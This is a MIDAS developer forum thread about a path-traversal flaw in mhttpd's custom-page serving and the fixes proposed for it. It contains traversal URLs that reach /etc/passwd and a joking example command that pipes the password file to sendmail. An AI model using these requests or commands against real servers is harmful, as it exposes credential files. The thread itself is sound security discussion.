Entry  01 Mar 2019, Konstantin Olchanski, Info, Gyrations of custom pages and ODB /Custom/Path 
Before the days of javascript and ajax and web 2.0, MIDAS introduced "custom pages" for
building graphical displays that could show "live" data from MIDAS and that could
have buttons and controls to operate slow controls equipment, etc.

This is how it works:
- entries from ODB /Custom are shown on the MIDAS menu -
an odb entry /Custom/Foo generates a link labeled "Foo"
to a special mhttpd url /CS/Foo.
- access to mhttpd url /CS/Foo invokes show_custom_page()
- show_custom_page() reads the custom page file name from ODB /Custom/Foo
- the content of this file is served to the web browser (after substituting the <odb> tags with values from ODB).
- in addition, it is possible to store the contents of the custom page in the ODB variable /Custom/Foo itself,
making it easy to edit the custom pages through the web browser (using the mhttpd odb editor).
- (if the value of /Custom/Foo has no "\n", then it's a file name, otherwise it is the page contents - see the sketch after this list).
- if /Custom/Path exists, it is prepended to all file names.
- read more about this here:
https://midas.triumf.ca/MidasWiki/index.php//Custom_ODB_tree
https://midas.triumf.ca/MidasWiki/index.php/Internal_Custom_Page
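
To make the old-style dispatch concrete, here is a minimal sketch of the decision
described in the list above (illustrative only - the type and helper names are mine,
not the actual show_custom_page() code):

  #include <string>
  #include <optional>

  // Sketch of the old-style /Custom/Foo dispatch (not the actual mhttpd code).
  // odb_value is the value of ODB /Custom/<page>; custom_path is the value of
  // ODB /Custom/Path, if that key exists.
  struct CustomPage {
     bool is_inline;     // true: 'body' is the page contents itself
     std::string body;   // page contents, or the name of the file to serve
  };

  CustomPage resolve_custom_page(const std::string& odb_value,
                                 const std::optional<std::string>& custom_path)
  {
     if (odb_value.find('\n') != std::string::npos)
        return { true, odb_value };                 // contents stored in ODB itself
     std::string filename = odb_value;              // otherwise it is a file name
     if (custom_path)
        filename = *custom_path + "/" + filename;   // /Custom/Path is prepended
     return { false, filename };
  }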

This method required each custom web page served by mhttpd to have a corresponding
entry in ODB /Custom. Quite tedious for big experiments with a large number
of web pages (in T2K/ND280/FGD, for 1 page per frontend board, these entries
had to be created using a script, not practical to create them manually).

To fix this, in 2015, a modification was made to the code for ODB /Custom/Path. Instead of reading the file name
from ODB /Custom/Foo, the filename was made by adding /Custom/Path and the URL itself:
URL /CS/Foo.html will serve the file ODBValue["/Custom/Path"]/Foo.html. In this scheme,
the ODB entry /Custom/Foo.html is optional and is only needed to create a link in the MIDAS menu.

Commit: https://bitbucket.org/tmidas/midas/commits/5a2ef7d66df353684c4b40882a391b64a068f61f made on 2015-03-19.
Corresponding midas forum entry: https://midas.triumf.ca/elog/Midas/1109 made on 2015-09-09.

This change had the effect of creating 2 different operating modes for custom pages:
- if ODB /Custom/Path was absent (the default case), file names are taken from ODB /Custom/Foo.
- if ODB /Custom/Path is present (it has to be created manually), file names are taken from the URLs.

These two modes could not be mixed: some experiments (TRIUMF MUSR/BNMR, CERN ALPHA, etc)
continued to use the old scheme (no /Custom/Path), while others switched
to the new scheme (DEAP, etc - TBC?).

(As best I can tell, this also created a security problem: using URLs containing "..", one can
force mhttpd to escape the /Custom/Path filename jail and cause it to serve arbitrary files from
the filesystem. Note that many web browsers remove the ".." entries from URLs, so special tricks
are required to exploit this).

Then, in 2017, something called "new custom pages" was added to mhttpd interprete().
commit https://bitbucket.org/tmidas/midas/commits/c574a45c6da1290430f5a85a348fb629596a0de0 made on 2017-07-24
(I cannot find the corresponding explanation on the midas forum).

As best I can tell, this code is intended to do the same thing that was done before:
map URLs like http://localhost:8080/Foo.html to file name ODBValue["/Custom/Path"]/Foo.html
and if this file exists, serve it to the browser.

However, the code has a bug - there is no check for absence of ODB /Custom/Path. If it does
not exist (as in experiments that do not use custom pages or use the old-style custom pages without
/Custom/Path), an empty string is used and a URL like http://localhost:8080/Foo.html becomes
mapped to /Foo.html (in the root of the file system, "/"!!!).
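
To illustrate the bug (a sketch with my own names, not the actual interprete() code):
with the key absent, the path defaults to an empty string and the URL is used as an
absolute filesystem path:

  #include <string>

  // Sketch of the 2017 URL-to-filename mapping and its bug (illustrative only).
  // If ODB /Custom/Path is absent, custom_path ends up "" and the URL
  // "/etc/hosts" maps straight to the real file /etc/hosts.
  std::string map_url_to_file(const std::string& custom_path, // "" if key absent!
                              const std::string& url)         // e.g. "/Foo.html"
  {
     return custom_path + url; // missing: check that /Custom/Path exists and is non-empty
  }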

This introduced 3 problems:
- http://localhost:8080/etc/hosts serves the system hosts file (and likewise /etc/passwd the password file - a security problem)
- because this code is before the odb code, it intercepts (and breaks) valid ODB URLs:
- on Linux, the ODB editor URL http://localhost:8080/root instead of showing the ODB root, attempts to serve the local subdirectory "/root" as a file
(fails, /root is a directory on most Linuxes). This is reported here: https://midas.triumf.ca/elog/Midas/1335 (2018-01-10)
- on MacOS, ODB editor URL http://localhost:8080/System instead of showing ODB /System, attempts to serve the local directory "/System" as a file (fails, 
/System is a subdirectory in MacOS). This is reported here: https://bitbucket.org/tmidas/midas/issues/156/mhttpd-odb-editor-cannot-open-system-on 
(2018-12-20)

The problem with broken access to the ODB editor URLs is fixed by commit:
https://bitbucket.org/tmidas/midas/commits/f071bc1daa4dc7ec582586659dd2339f1cd1fa21 (2018-12-21)
https://midas.triumf.ca/elog/Midas/1416

The fix unconditionally creates /Custom/Path and sets it to the value of $MIDAS_DIR or $MIDASSYS.

This breaks experiments that use custom pages with no /Custom/Path (ALPHA, BNMR/BNQR), see
https://bitbucket.org/tmidas/midas/issues/157/odb-custom-is-broken, and this is impossible
to fix by deleting /Custom/Path as it will be created again.

Also the problem with serving the system password file remains, see
https://midas.triumf.ca/elog/Midas/1425

So, a https://en.wikipedia.org/wiki/SNAFU

Since then, we have changed the mhttpd URL scheme: we no longer use URL subdirectories to navigate the ODB editor (we now use &odb_path=xxx)
and to refer to custom files (we now use &cmd=custom&page=xxx).

This liberates the mhttpd URL space for serving custom files without colliding with mhttpd internals and allows us to repair the current situation.

I will propose a solution in a follow-up message.

K.O.

P.S. The actual series of malfunctions is a bit more complicated than I described in this message,
but there is no need to get to the very bottom of this as we can now do
a fairly clean solution.
    Reply  04 Mar 2019, Stefan Ritt, Info, Gyrations of custom pages and ODB /Custom/Path 
Parsing all URLs in mhttpd to prevent /etc/passwd etc. from being returned is tricky, because people can use escape sequences etc. Therefore I think it is much better to restrict file access 
on the file system level when opening a file. The only escape one could have there is "..", which can be tested easily. 

Therefore, I propose to restrict file access to two well-defined directories, which is one system directory and one user directory. The system directory should be defined via 
$MIDASSYS/resources, and the user directory should be the experiment directory (as defined in exptab) followed by "resources". So if MIDASSYS equals to /usr/local/midas and the 
experiment directory equals to /home/users/exp for example, we would only have these two directories (and of course the subdirectories within these) served by mhttpd:

$MIDASSYS/resources -> /usr/local/midas/resources
<exptab>/resources -> /home/users/exp/resources

These directories should be hard-wired into mhttpd, and not go through an ODB entry, since otherwise one could manipulate the ODB entries (knowingly or unknowingly) and open a 
back-door. 

If users need a more complex structure, they can put soft links into these directories.

The code which opens a resource file should then first evaluate $MIDASSYS, then add "/resources/", then add the requested file name, make sure that there is no ".." in the file name, 
then open the file. If not existing, do the same for the <exptab>/resources/ directory.
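
A minimal sketch of this lookup, assuming the two hard-wired directories described
above (helper names are illustrative, not an actual implementation):

  #include <cstdlib>
  #include <fstream>
  #include <string>
  #include <vector>

  // Try $MIDASSYS/resources/<name>, then <exptab>/resources/<name>,
  // rejecting any file name that contains "..".
  std::string find_resource(const std::string& name, const std::string& exptab_dir)
  {
     if (name.find("..") != std::string::npos)
        return "";                                  // reject traversal attempts
     std::vector<std::string> dirs;
     if (const char* midassys = std::getenv("MIDASSYS"))
        dirs.push_back(std::string(midassys) + "/resources/");
     dirs.push_back(exptab_dir + "/resources/");
     for (const auto& dir : dirs) {
        std::string path = dir + name;
        if (std::ifstream(path).good())             // file exists and is readable
           return path;
     }
     return "";                                     // not found
  }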

This change will break most experiments, and forces people to move their custom pages to different directories, but I think it's the only clean solution and we just have to bite the 
bullet.

Comments are welcome.

Stefan
       Reply  04 Mar 2019, Thomas Lindner, Info, Gyrations of custom pages and ODB /Custom/Path 
Hi Stefan and Konstantin,

I think that this proposal sounds fairly reasonable.  I agree that we might as well move to a secure final solution at this point.  

One comment: since this change would break almost every experiment I have worked on for the last 4 years, it would be nice to add a command-line option to mhttpd that preserves the old /Custom/Path behavior.  This would allow experiments a transition 
period, so that they didn't immediately need to fix their setup.  The command-line option could be clearly marked as obsolete behaviour and could be removed within a year.

Cheers,
Thomas



> Parsing all URLs in mhttpd to prevent /etc/passwd etc. from being returned is tricky, because people can use escape sequences etc. Therefore I think it is much better to restrict file access 
> on the file system level when opening a file. The only escape one could have there is "..", which can be tested easily. 
> 
> Therefore, I propose to restrict file access to two well-defined directories, which is one system directory and one user directory. The system directory should be defined via 
> $MIDASSYS/resources, and the user directory should be the experiment directory (as defined in exptab) followed by "resources". So if MIDASSYS equals to /usr/local/midas and the 
> experiment directory equals to /home/users/exp for example, we would only have these two directories (and of course the subdirectories within these) served by mhttpd:
> 
> $MIDASSYS/resources -> /usr/local/midas/resources
> <exptab>/resources -> /home/users/exp/resources
> 
> These directories should be hard-wired into mhttpd, and not go through an ODB entry, since otherwise one could manipulate the ODB entries (knowingly or unknowingly) and open a 
> back-door. 
> 
> If users need a more complex structure, they can put soft links into these directories.
> 
> The code which opens a resource file should then first evaluate $MIDASSYS, then add "/resources/", then add the requested file name, make sure that there is no ".." in the file name, 
> then open the file. If not existing, do the same for the <exptab>/resources/ directory.
> 
> This change will break most experiments, and forces people to move their custom pages to different directories, but I think it's the only clean solution and we just have to bite the 
> bullet.
> 
> Comments are welcome.
> 
> Stefan
          Reply  04 Mar 2019, Stefan Ritt, Info, Gyrations of custom pages and ODB /Custom/Path 
Sounds reasonable to me.

Stefan

> Hi Stefan and Konstantin,
> 
> I think that this proposal sounds fairly reasonable.  I agree that we might as well move to a secure final solution at this point.  
> 
> One comment: since this change would break almost every experiment I have worked on for the last 4 years, it would be nice to add a command-line option to mhttpd that preserves the old /Custom/Path behavior.  This would allow experiments a transition 
> period, so that they didn't immediately need to fix their setup.  The command-line option could be clearly marked as obsolete behaviour and could be removed within a year.
> 
> Cheers,
> Thomas
> 
> 
> 
> > Parsing all URLs in mhttpd to prevent /etc/passwd etc. from being returned is tricky, because people can use escape sequences etc. Therefore I think it is much better to restrict file access 
> > on the file system level when opening a file. The only escape one could have there is "..", which can be tested easily. 
> > 
> > Therefore, I propose to restrict file access to two well-defined directories, which is one system directory and one user directory. The system directory should be defined via 
> > $MIDASSYS/resources, and the user directory should be the experiment directory (as defined in exptab) followed by "resources". So if MIDASSYS equals to /usr/local/midas and the 
> > experiment directory equals to /home/users/exp for example, we would only have these two directories (and of course the subdirectories within these) served by mhttpd:
> > 
> > $MIDASSYS/resources -> /usr/local/midas/resources
> > <exptab>/resources -> /home/users/exp/resources
> > 
> > These directories should be hard-wired into mhttpd, and not go through an ODB entry, since otherwise one could manipulate the ODB entries (knowingly or unknowingly) and open a 
> > back-door. 
> > 
> > If users need a more complex structure, they can put soft links into these directories.
> > 
> > The code which opens a resource file should then first evaluate $MIDASSYS, then add "/resources/", then add the requested file name, make sure that there is no ".." in the file name, 
> > then open the file. If not existing, do the same for the <exptab>/resources/ directory.
> > 
> > This change will break most experiments, and forces people to move their custom pages to different directories, but I think it's the only clean solution and we just have to bite the 
> > bullet.
> > 
> > Comments are welcome.
> > 
> > Stefan
             Reply  04 Mar 2019, Suzannah Daviel, Info, Gyrations of custom pages and ODB /Custom/Path 
I see two separate issues here. 

One is restricting the custom pages to ONE directory such as 
<exptab>/resources -> /home/users/exp/resources
and its subdirectories which seems like a good solution for all the
reasons you've mentioned. 

The other issue is the use of the "Path" key in /Custom, which is used to differentiate
between the "new" way (all resources served from the Path directory) 
and the original way where all the custom keys are specified with their full directories.

Recent versions of Midas had broken the original behaviour by insisting on the presence of the
"Path" key.  Konstantin fixed this by allowing the "Path" key to take the value "".  It is true
that some experiments currently may be serving resources from more than one directory tree, but changing
to storage of all custom pages in one directory (and its subdirectories) does not necessarily mean that
the original way of serving resources must be made obsolete.
 
I actually like the original way of specifying the custom keys for the pages and resources under /Custom, which
is presently selected  without the /Custom/Path key present at all (older versions) or with the
/Custom/Path key set to "" (latest versions). I like it for debugging, and I like to be able to see 
at a glance what resource files are in use from /Custom. 

I have a suggestion:

The resources could still be served from the /Custom directory if desired, except now mhttpd will ALWAYS add the 
fixed path in front of the given paths in /Custom. This would mean a fixed path and a minimal disruption to older pages 
(the <script> and <link> statements in the HTML code to include the resources would not need to be changed).
The "/Path" key is no longer be useful, since the resource path is now fixed. Instead a key e.g. "FlagRS"  could 
be used to select the desired behaviour,  with the default being the "new" (no key present).

For example, the full directory paths in /custom
ScanParams&                     /home/users/online/custom/scan/scan_select_popup.html
mpet.css!                       /home/users/online/custom/rs/mpet.css
scanvoltages!                   /home/users/online/custom/scan/scan_voltages.js

would become subdirectory path(s)
ScanParams&                     custom/scan/scan_select_popup.html
mpet.css!                       custom/rs/mpet.css
scanvoltages!                   custom/scan/scan_voltages.js
FlagRS                          y

The pages would be served from /home/users/exp/resources/custom/...

Suzannah

 
> > Hi Stefan and Konstantin,
> > 
> > I think that this proposal sounds fairly reasonable.  I agree that we might as well move to a secure final solution at this point.  
> > 
> > One comment: since this change would break almost every experiment I have worked on for the last 4 years, it would be nice to add a command-line option to mhttpd that preserves the old /Custom/Path behavior.  This would allow experiments a transition 
> > period, so that they didn't immediately need to fix their setup.  The command-line option could be clearly marked as obsolete behaviour and could be removed within a year.
> > 
> > Cheers,
> > Thomas
> > 
> > 
> > 
> > > Parsing all URLs in mhttpd to prevent /etc/passwd etc. from being returned is tricky, because people can use escape sequences etc. Therefore I think it is much better to restrict file access 
> > > on the file system level when opening a file. The only escape one could have there is "..", which can be tested easily. 
> > > 
> > > Therefore, I propose to restrict file access to two well-defined directories, which is one system directory and one user directory. The system directory should be defined via 
> > > $MIDASSYS/resources, and the user directory should be the experiment directory (as defined in exptab) followed by "resources". So if MIDASSYS equals to /usr/local/midas and the 
> > > experiment directory equals to /home/users/exp for example, we would only have these two directories (and of course the subdirectories within these) served by mhttpd:
> > > 
> > > $MIDASSYS/resources -> /usr/local/midas/resources
> > > <exptab>/resources -> /home/users/exp/resources
> > > 
> > > These directories should be hard-wired into mhttpd, and not go through an ODB entry, since otherwise one could manipulate the ODB entries (knowingly or unknowingly) and open a 
> > > back-door. 
> > > 
> > > If users need a more complex structure, they can put soft links into these directories.
> > > 
> > > The code which opens a resource file should then first evaluate $MIDASSYS, then add "/resources/", then add the requested file name, make sure that there is no ".." in the file name, 
> > > then open the file. If not existing, do the same for the <exptab>/resources/ directory.
> > > 
> > > This change will break most experiments, and forces people to move their custom pages to different directories, but I think it's the only clean solution and we just have to bite the 
> > > bullet.
> > > 
> > > Comments are welcome.
> > > 
> > > Stefan
                Reply  04 Mar 2019, Konstantin Olchanski, Info, Gyrations of custom pages and ODB /Custom/Path 
Hi, guys, as I was exploring the code and the commit history on Thursday (git rules!) and
as I worked on getting the old custom files to work with Suzannah on Friday, I think
I know how I want this code to work. I think there is no need to break with the old
way of doing things and force every experiment to move things around if they want
to use the latest midas.

I will write more about this, but in a nutshell, I am happy with the current code:
- the old custom pages work (filename is taken from ODB, with /Custom/Path prepended if it exists; this is what we had for a very long time)
- the serving of new custom pages also works - via Stefan's code in interprete() where the value of /Custom/Path is prepended to the URL
  and if the file exists, we serve it. The only problem in that code was the missing check for an absent or empty ODB /Custom/Path.
- the serving of new custom pages through the normal resource path (show_resource()) also works now,
   this serves files from $MIDASSYS/resources, from ODB /Experiment/Resource and a few other locations. (this code was there
   for a long time, but was disabled because, for a number of reasons, things like http://localhost:8080/Status.html did not work right;
   after fixing a few buglets, they do now).

The serving of /etc/passwd I killed by forbidding "/" (the directory separator) in resource file names. I think this is safer
for enforcing a file jail compared to checking for "..".
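
Something along these lines (a sketch, not the actual commit):

  #include <string>

  // Reject any file name containing a directory separator (illustrative only).
  // This keeps the served namespace flat: "../x", "a/b" and "/etc/passwd" are
  // all refused without any ".." pattern matching.
  bool custom_file_name_ok(const std::string& name)
  {
     return name.find('/') == std::string::npos;
  }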

I think the current code fixes all the reported problems (in conjunction with the change of the URL scheme) -
- /Custom/Path set to "" now works and provides the old way of doing custom pages
- /Custom/Path set to a directory name works and all Thomas's experiments should be good. The old custom files way *also* works, as long as the filenames in ODB are adjusted.
- URL /root and /System no longer try to serve system directories, plus /Custom/Path set to "/" is explicitly forbidden.
- mhttpd cannot serve /etc/passwd by default as "/" is forbidden in file names added to /Custom/Path. (I discount the case where mhttpd is running in /etc or /Custom/Path is set to /etc or symlinked to /etc)

But not all is good. The change of custom page URL scheme from /CS/... to top level or ?cmd=custom&page=...
cannot be swept under the rug - the user will have to make changes to their custom pages to adjust for it;
I see no way to avoid that. The current code catches and redirects/serves/helps with some of that
(i.e. pages loading custom files like "bnmr.css" still work even though bnmr.css is no longer under /CS/bnmr.css).

Again, apologies that things are moving faster than I can write them up. I am trying.


K.O.


> I see two separate issues here. 
> 
> One is restricting the custom pages to ONE directory such as 
> <exptab>/resources -> /home/users/exp/resources
> and its subdirectories which seems like a good solution for all the
> reasons you've mentioned. 
> 
> The other issue is the use of the "Path" key in /Custom, which is used to differentiate
> between the "new" way (all resources served from the Path directory) 
> and the original way where all the custom keys are specified with their full directories.
> 
> Recent versions of Midas had broken the original behaviour by insisting on the presence of the
> "Path" key.  Konstantin fixed this by allowing the "Path" key to take the value "".  It is true
> that some experiments currently may be serving resources from more than one directory tree, but changing
> to storage of all custom pages in one directory (and its subdirectories) does not necessarily mean that
> the original way of serving resources must be made obsolete.
>  
> I actually like the original way of specifying the custom keys for the pages and resources under /Custom, which
> is presently selected  without the /Custom/Path key present at all (older versions) or with the
> /Custom/Path key set to "" (latest versions). I like it for debugging, and I like to be able to see 
> at a glance what resource files are in use from /Custom. 
> 
> I have a suggestion:
> 
> The resources could still be served from the /Custom directory if desired, except now mhttpd will ALWAYS add the 
> fixed path in front of the given paths in /Custom. This would mean a fixed path and a minimal disruption to older pages 
> (the <script> and <link> statements in the HTML code to include the resources would not need to be changed).
> The "/Path" key is no longer be useful, since the resource path is now fixed. Instead a key e.g. "FlagRS"  could 
> be used to select the desired behaviour,  with the default being the "new" (no key present).
> 
> For example, the full directory paths in /custom
> ScanParams&                     /home/users/online/custom/scan/scan_select_popup.html
> mpet.css!                       /home/users/online/custom/rs/mpet.css
> scanvoltages!                   /home/users/online/custom/scan/scan_voltages.js
> 
> would become subdirectory path(s)
> ScanParams&                     custom/scan/scan_select_popup.html
> mpet.css!                       custom/rs/mpet.css
> scanvoltages!                   custom/scan/scan_voltages.js
> FlagRS                          y
> 
> The pages would be served from /home/users/exp/resources/custom/...
> 
> Suzannah
> 
>  
> > > Hi Stefan and Konstantin,
> > > 
> > > I think that this proposal sounds fairly reasonable.  I agree that we might as well move to a secure final solution at this point.  
> > > 
> > > One comment: since this change would break almost every experiment I have worked on for the last 4 years, it would be nice to add a command-line option to mhttpd that preserves the old /Custom/Path behavior.  This would allow experiments a transition 
> > > period, so that they didn't immediately need to fix their setup.  The command-line option could be clearly marked as obsolete behaviour and could be removed within a year.
> > > 
> > > Cheers,
> > > Thomas
> > > 
> > > 
> > > 
> > > > Parsing all URLs in mhttpd to prevent /etc/passwd etc. from being returned is tricky, because people can use escape sequences etc. Therefore I think it is much better to restrict file access 
> > > > on the file system level when opening a file. The only escape one could have there is "..", which can be tested easily. 
> > > > 
> > > > Therefore, I propose to restrict file access to two well-defined directories, which is one system directory and one user directory. The system directory should be defined via 
> > > > $MIDASSYS/resources, and the user directory should be the experiment directory (as defined in exptab) followed by "resources". So if MIDASSYS equals to /usr/local/midas and the 
> > > > experiment directory equals to /home/users/exp for example, we would only have these two directories (and of course the subdirectories within these) served by mhttpd:
> > > > 
> > > > $MIDASSYS/resources -> /usr/local/midas/resources
> > > > <exptab>/resources -> /home/users/exp/resources
> > > > 
> > > > These directories should be hard-wired into mhttpd, and not go through an ODB entry, since otherwise one could manipulate the ODB entries (knowingly or unknowingly) and open a 
> > > > back-door. 
> > > > 
> > > > If users need a more complex structure, they can put soft links into these directories.
> > > > 
> > > > The code which opens a resource file should then first evaluate $MIDASSYS, then add "/resources/", then add the requested file name, make sure that there is no ".." in the file name, 
> > > > then open the file. If not existing, do the same for the <exptab>/resources/ directory.
> > > > 
> > > > This change will break most experiments, and forces people to move their custom pages to different directories, but I think it's the only clean solution and we just have to bite the 
> > > > bullet.
> > > > 
> > > > Comments are welcome.
> > > > 
> > > > Stefan
                   Reply  05 Mar 2019, Stefan Ritt, Info, Gyrations of custom pages and ODB /Custom/Path 
First, I did not propose to give up the /Custom tree in the ODB, sorry for the misunderstanding. We still need it in order to display the menu with the custom pages at the left side navigation bar. In principle all can stay like it is, except we remove /Custom/Path and rewrite the file server to restrict it only 
to the two mentioned directories.

Second, to keep the compatibility with running experiments, we have to make the move over as simply as possible. Thomas proposed a "deprecated" mhttpd command line option. As an alternative, I propose to make a symbolic link from <exptab>/resources to where the old /Custom/Path was pointing 
to. This should work as well, and we don't have to implement a parameter in mhttpd.

Third, the /Custom/Path should really go away. We are all concerned that people can read security critical files from the whole file system. To read those files, people need access to mhttpd, so they have to know at least the authentication credentials to pass the Apache firewall in front of mhttpd or 
whatever. This means they have access to the ODB, and then they can simply change /Custom/Path to "/" and voila - they have again access to /etc/passwd. This is why I propose symbolic links on the file system. This area is much better protected than the ODB, since people have to physically log into 
a machine to change it.

Best,
Stefan
                      Reply  05 Mar 2019, Thomas Lindner, Info, Gyrations of custom pages and ODB /Custom/Path 
> First, I did not propose to give up the /Custom tree in the ODB, sorry for the misunderstanding. We still need it in order to display the menu with the custom pages at the left side navigation bar. In principle all can stay like it is, except we remove /Custom/Path and rewrite the file server to restrict it only 
> to the two mentioned directories.
> 
> Second, to keep the compatibility with running experiments, we have to make the move over as simply as possible. Thomas proposed a "deprecated" mhttpd command line option. As an alternative, I propose to make a symbolic link from <exptab>/resources to where the old /Custom/Path was pointing 
> to. This should work as well, and we don't have to implement a parameter in mhttpd.

That sounds fine, as long as it is clearly documented.

> Third, the /Custom/Path should really go away. We are all concerned that people can read security critical files from the whole file system. To read those files, people need access to mhttpd, so they have to know at least the authentication credentials to pass the Apache firewall in front of mhttpd or 
> whatever. This means they have access to the ODB, and then they can simply change /Custom/Path to "/" and voila - they have again access to /etc/passwd. This is why I propose symbolic links on the file system. This area is much better protected than the ODB, since people have to physically log into 
> a machine to change it.

Yes, I agree that /Custom/Path should go away.

Cheers,
Thomas
                         Reply  05 Mar 2019, Konstantin Olchanski, Info, Gyrations of custom pages and ODB /Custom/Path 
> 
> That sounds fine, as long as it is clearly documented.
> 

I am a true believer in the two-man rule. One person writes the code, another person
documents it - this keeps everything honest and ensures that at least one
person (the documenter) understands what is going on. (as the coder, I can easily
write documentation that nobody understands, or that is completely wrong).

> > Third, the /Custom/Path should really go away.
> Yes, I agree that /Custom/Path should go away.

/Custom/Path as a resource search path or
/Custom/Path that is prepended to file names of old-style custom pages?

The second use is safe and does not need to be removed.

The first use is now redundant - files are now also served by send_resource()
through the normal resource path, which includes ODB /Experiment/Resource
(something that has been there for a long time).

K.O.
                      Reply  05 Mar 2019, Konstantin Olchanski, Info, Gyrations of custom pages and ODB /Custom/Path 
> First, I did not propose to give up the /Custom tree in the ODB, sorry for the misunderstanding.
> We still need it in order to display the menu with the custom pages at the left side navigation bar.
> In principle all can stay like it is, except we remove /Custom/Path and rewrite the file server to restrict it only 
> to the two mentioned directories.
> 

We have several large installations at TRIUMF that use the old-style custom pages - MUSR, BNMR/BNQR, TITAN (and more?) -
none of these experiments are going away any time soon and none of these custom pages are rewriting themselves.

So, I think we are stuck with supporting old-style custom pages in the short and in the long term, unless we decide to abandon these existing users of MIDAS.

And the old-style custom pages come with the old-style scheme of keeping file names in ODB. Removing
it will require experiments to reorganize their filesystems (different custom pages may come from different
git repositories on different disks - not trivially placeable all in the same directory).

Plus some people (including myself) like to have some things explicitly specified - I want to know that
this page loads this file without having to guess where in a search path it came from today.

>
> Thomas proposed a "deprecated" mhttpd command line option.
>

"deprecated" does not work.

"we removed it because it stopped working and we cannot fix it" works,
"do not use it for new experiments" works (until a user comes back with "but I really like this feature!")
"we will remove it at an unknown future date because we think nobody should use it" does not work.

>
> As an alternative, I propose to make a symbolic link from <exptab>/resources to where the old /Custom/Path was pointing 
> to. This should work as well, and we don't have to implement a parameter in mhttpd.
> 

All experiments at TRIUMF that use old-style custom pages do not use /Custom/Path. In the new scheme
of things, setting /Custom/Path to anything other than blank will break them.

>
> Third, the /Custom/Path should really go away.
>

For once, I agree. /Custom/Path did not exist and should not have been added.

> We are all concerned that people can read security critical files from the whole file system.

Only in the default configuration and in configurations that would realistically be used by an experiment. This
excludes the case of "/Custom/Path" set to "/etc" - not the default and unlikely to be used by any experiment.

> To read those files, people need access to mhttpd, so they have to know at least the authentication credentials to pass the Apache firewall in front of mhttpd or 
> whatever. This means they have access to the ODB, and then they can simply change /Custom/Path to "/" and voila - they have again access to /etc/passwd.

Nope. They have to set /Custom/Path to "/etc" or start mhttpd under "/etc" or point /Custom/Path to a symlink to /etc (mhttpd will not serve "etc/passwd"; "/" in the filename is not permitted).

> This is why I propose symbolic links on the file system.

Some people dislike symlinks.
Some filesystems do not implement symlinks. (should we prevent mhttpd from running on the ms-dos fat filesystem "just because"?)

> This area is much better protected than the ODB, since people have to physically log into 
> a machine to change it.

Nope. You can create symlinks from mhttpd by running the "ln -s" command from ODB "/Programs/xxx/Start Command"

K.O.
                         Reply  05 Mar 2019, Stefan Ritt, Info, Gyrations of custom pages and ODB /Custom/Path 
I stop the discussion here because it goes in circles. We can't convince each others, so somebody has to give up, and that's me.

> We have several large installations at TRIUMF that use the old-style custom pages - MUSR, BNMR/BNQR, TITAN (and more?) -
> none of these experiments are going away any time soon and none of these custom pages are rewriting themselves.

Then you have a problem. Last time I told you that the new URL scheme breaks parts of the custom pages, especially the ones containing GIF images with labels on them. You then said "these experiments have to bite the bullet and 
change it", and I proceeded. Now you tell me that this will not happen. So please be aware that these experiments do have a problem and probably are stuck with an older midas version.

> > This area is much better protected than the ODB, since people have to physically log into 
> > a machine to change it.
> 
> Nope. You can create symlinks from mhttpd by running the "ln -s" command from ODB "/Programs/xxx/Start Command"

You can also set a start command "cat /etc/passwd | sendmail me@triumf.ca" and you get the password file ;-)

Stefan
                            Reply  05 Mar 2019, Konstantin Olchanski, Info, Gyrations of custom pages and ODB /Custom/Path 
> > We have several large installations at TRIUMF that use the old-style custom pages - MUSR, BNMR/BNQR, TITAN (and more?) -
> > none of these experiments are going away any time soon and none of these custom pages are rewriting themselves.
> 
> Then you have a problem. Last time I told you that the new URL scheme breaks parts of the custom pages, especially the ones containing GIF images with labels on them. You then said "these experiments have to bite the bullet and 
> change it", and I proceeded. Now you tell me that this will not happen. So please be aware that these experiments do have a problem and probably are stuck with an older midas version.
> 

Yes, there is a problem and some adjustment is needed.

I do not think the new URL scheme requires us to abandon existing experiments.

At this point I am trying to minimize the number of adjustments required, for example:

If we do not need to move files around (and create symlinks), it is good - so the old scheme of saving file names in ODB lives on
If we do not need to edit every file to adjust every URL, it is good - so now that http://blah/CS/custom_page is gone (no more "CS/"), http://blah/custom_page had to be implemented
If we do not need to replace all the ODB /Alias entries, http://blah/ODB_PATH now redirects to http://blah/?cmd=odb&odb_path=ODB_PATH and all the old aliases to ODB still work

I am going through these things as I discover them with Suzannah.

The biggest problem so far we have seen is with some pages having incorrect form submission
settings - some forms use the wrong form "action" attribute, which worked before (we do not know
why) and definitely does not work now. This is not something that we can fix on the midas side.

K.O.
                               Reply  05 Mar 2019, Stefan Ritt, Info, Gyrations of custom pages and ODB /Custom/Path 
> The biggest problem so far we have seen is with some pages having incorrect form submission
> settings - some forms use the wrong form "action" attribute, which worked before (we do not know
> why) and definitely does not work now. This is not something that we can fix on the midas side.

Make sure you check any page which has a GIF image with bars and labels. I believe the new URL system has an issue there (maybe still an explicit /CS/... somewhere).

Stefan
                                  Reply  06 Mar 2019, Konstantin Olchanski, Info, Gyrations of custom pages and ODB /Custom/Path 
> > The biggest problem so far we have seen is with some pages having incorrect form submission
> > settings - some forms use the wrong form "action" attribute, which worked before (we do not know
> > why) and definitely does not work now. This is not something that we can fix on the midas side.
> 
> Make sure you check any page which has a GIF image with bars and labels. I believe the new URL system has an issue there (maybe still an explicit /CS/... somewhere).
> 

Yes, we tried it with Suzannah and to my amazement it worked on the 1st try in her test experiment.

However, the example in midas/examples/custom does not quite work - the gif file seems to be broken and displays as gibberish for me.

Also in show_custom_page() I see code for "toggle" and "edit", but I have no example to test them.

K.O.
                   Reply  05 Mar 2019, Stefan Ritt, Info, Gyrations of custom pages and ODB /Custom/Path 
> - mhttpd cannot serve /etc/passwd by default as "/" is forbidden in file names added to /Custom/Path.

You do this with a simple

if (custom_path == "/")

which does work but does not cover cases such as

"/./"
"/etc/../"
"/home/meg/../../"

Good luck with finding all the weird combinations which can lead to break-ins. So we are where we were before.

Still, in my opinion we should not have a path in the ODB. The custom path should be hard-wired and combined with symbolic links if necessary. The custom HTML pages under /Custom in the ODB have to be scanned for ".."s.
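
One conventional way to close the normalization loophole (my suggestion, not from
either post) is to canonicalize the assembled path with POSIX realpath(3) and then
verify that it still lies under the allowed directory:

  #include <limits.h>
  #include <stdlib.h>
  #include <string>

  // Canonicalize 'candidate' and check it stays inside 'jail' (itself already
  // canonical, with a trailing '/'). realpath() resolves ".", ".." and symlinks,
  // so "/./", "/etc/../" and friends are normalized before the comparison.
  bool inside_jail(const std::string& jail, const std::string& candidate)
  {
     char resolved[PATH_MAX];
     if (!realpath(candidate.c_str(), resolved))
        return false;                      // nonexistent or unresolvable path
     return std::string(resolved).compare(0, jail.size(), jail) == 0;
  }

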